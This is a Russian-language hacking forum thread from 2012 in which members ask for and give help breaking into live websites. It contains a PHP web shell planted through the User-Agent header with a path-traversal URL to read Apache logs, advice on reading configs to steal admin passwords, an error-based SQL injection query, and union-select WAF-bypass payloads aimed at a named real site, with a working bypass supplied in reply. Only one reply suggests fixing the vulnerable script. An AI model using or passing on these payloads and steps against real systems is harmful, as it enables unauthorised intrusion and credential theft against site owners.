HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.07.2012, 09:30
jasp3r
Познающий
Регистрация: 23.04.2012
Сообщений: 44
С нами: 7396886

Репутация: 0
По умолчанию

в модуле блогов на phpbb нашел xss(пасивку), но почему-то кроме настроек чата и phpsession больше ничего на сниффер не приходит.

вот сама xss
 
Ответить с цитированием

  #2  
Старый 16.07.2012, 09:54
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Цитата:
Сообщение от gateout  
на сайт в логи apache засунул через User-agent
'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>
Захожу http://site.com/attachment/..%252F..%252F..%252F..%252F..%252F..%252F..%252F. .%252F..%252F..%252Fvar%252Flog%252Fapache2%252F_c ustom.log%2500.jpg
и вижу содержимое лог файла включая
91.221.56.225 - - [15/Jul/2012:21:47:24 +0400] "GET / HTTP/1.1" 200 64697 "-" "'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>"
Но php-получается не исполняется. Что делать?
Ты спалил URL

Я тоже попробывал проинклюдить логи, но там не инклюд, а читалка. Теперь читай конфиги => phpmyadmin => пароль админа => admin.твой_сайт.ru.
 
Ответить с цитированием

  #3  
Старый 16.07.2012, 10:38
gateout
Новичок
Регистрация: 10.07.2012
Сообщений: 15
С нами: 7284566

Репутация: 0
По умолчанию

Да, я понял, что не include (к сожалению поздновато). посмотрю по поводу phpMyadmin. Подправил сообщение с сайтом)промашка вышла, спасибо.
 
Ответить с цитированием

  #4  
Старый 16.07.2012, 13:13
ex'pert
Новичок
Регистрация: 28.05.2011
Сообщений: 19
С нами: 7873526

Репутация: -3
По умолчанию

Подскажите что можно сделать при найденном sql выдало ошибку:

Код:
Script: /index.php 
Line: 138 
Error(1062):Duplicate entry '4CuiUaxdwIo1' for key 'group_key' 
in query: UPDATE mod_offers SET count_out=(count_out+1) WHERE id=''and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(85),CHAR(97),CHAR(120),CHAR(100),CHAR(119),CHAR(73),CHAR(111)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and''
 
Ответить с цитированием

  #5  
Старый 16.07.2012, 13:17
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами: 7854806

Репутация: 173


По умолчанию

Цитата:
Сообщение от ex'pert  
Подскажите что можно сделать при найденном sql
Взломать!
 
Ответить с цитированием

  #6  
Старый 16.07.2012, 13:30
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от ex'pert  
Подскажите что можно сделать при найденном sql выдало ошибку:
Код:
Script: /index.php 
Line: 138 
Error(1062):Duplicate entry '4CuiUaxdwIo1' for key 'group_key' 
in query: UPDATE mod_offers SET count_out=(count_out+1) WHERE id=''and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(85),CHAR(97),CHAR(120),CHAR(100),CHAR(119),CHAR(73),CHAR(111)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and''
Цитата:
Сообщение от OxoTnik  
Взломать!
Доработать скрипт, поставить фильтрации, сделать какую нить систему логов которая при ошибках админу давала знать о выявленых ошибках, смотря с какой стороны тут посмотреть)))
 
Ответить с цитированием

  #7  
Старый 16.07.2012, 18:04
gateout
Новичок
Регистрация: 10.07.2012
Сообщений: 15
С нами: 7284566

Репутация: 0
По умолчанию

phpmyadmin на сайте не оказалось, насколько я понял. Нашел параметры подключения к БД, но логины/ пароли цепляются из БД. подскажите, куда дальше двигаться?

то есть исходные данные:

1) есть читалка, то есть могу прочитать данный из файлов на сервере.

2) есть phpinfo

3) есть параметры подключения к БД,

как продолжить атаку?
 
Ответить с цитированием

  #8  
Старый 16.07.2012, 19:11
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию

Цитата:
Сообщение от gateout  
phpmyadmin на сайте не оказалось, насколько я понял. Нашел параметры подключения к БД, но логины/ пароли цепляются из БД. подскажите, куда дальше двигаться?
то есть исходные данные:
1) есть читалка, то есть могу прочитать данный из файлов на сервере.
2) есть phpinfo
3) есть параметры подключения к БД,
как продолжить атаку?
Читай сорцы двига, ищи еще баги
 
Ответить с цитированием

  #9  
Старый 16.07.2012, 20:02
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
С нами: 8960082

Репутация: -14
По умолчанию

Не могу обойти WAF...

Цитата:
Сообщение от None  
http://www.tpsftz.org/page.php?programmes&cat=5&subcat=1+un/**/ion+sel/**/ect+1,2,3,4,5,6,7,8,9,10,11,12,13--
- OK но не выводит

Цитата:
Сообщение от None  
http://www.tpsftz.org/page.php?programmes&cat=5&subcat=1/*UnIoN*/union/*SeLecT*/select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
- 403

Цитата:
Сообщение от None  
http://www.tpsftz.org/page.php?programmes&cat=5&subcat=999999.-999+1+union+%28select+1,2,3,4,5,6,7,8,9,10,11,12,1 3%29--+
- OK но не выводит

Вопрос: как обойти?
 
Ответить с цитированием

  #10  
Старый 16.07.2012, 20:13
a.dimka
Новичок
Регистрация: 14.12.2011
Сообщений: 0
С нами: 7585526

Репутация: 3
По умолчанию

Цитата:
Сообщение от aydin-ka  
Не могу обойти WAF...
-
OK
но не выводит
-
403
-
OK
но не выводит
Вопрос: как обойти?
http://www.tpsftz.org/page.php?programmes&cat=5&subcat=1'+union%23%0asel ect+1,2,3,4,5,6,7,8,9,10,11,12,13--+f

там string, кавычку не убирай.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.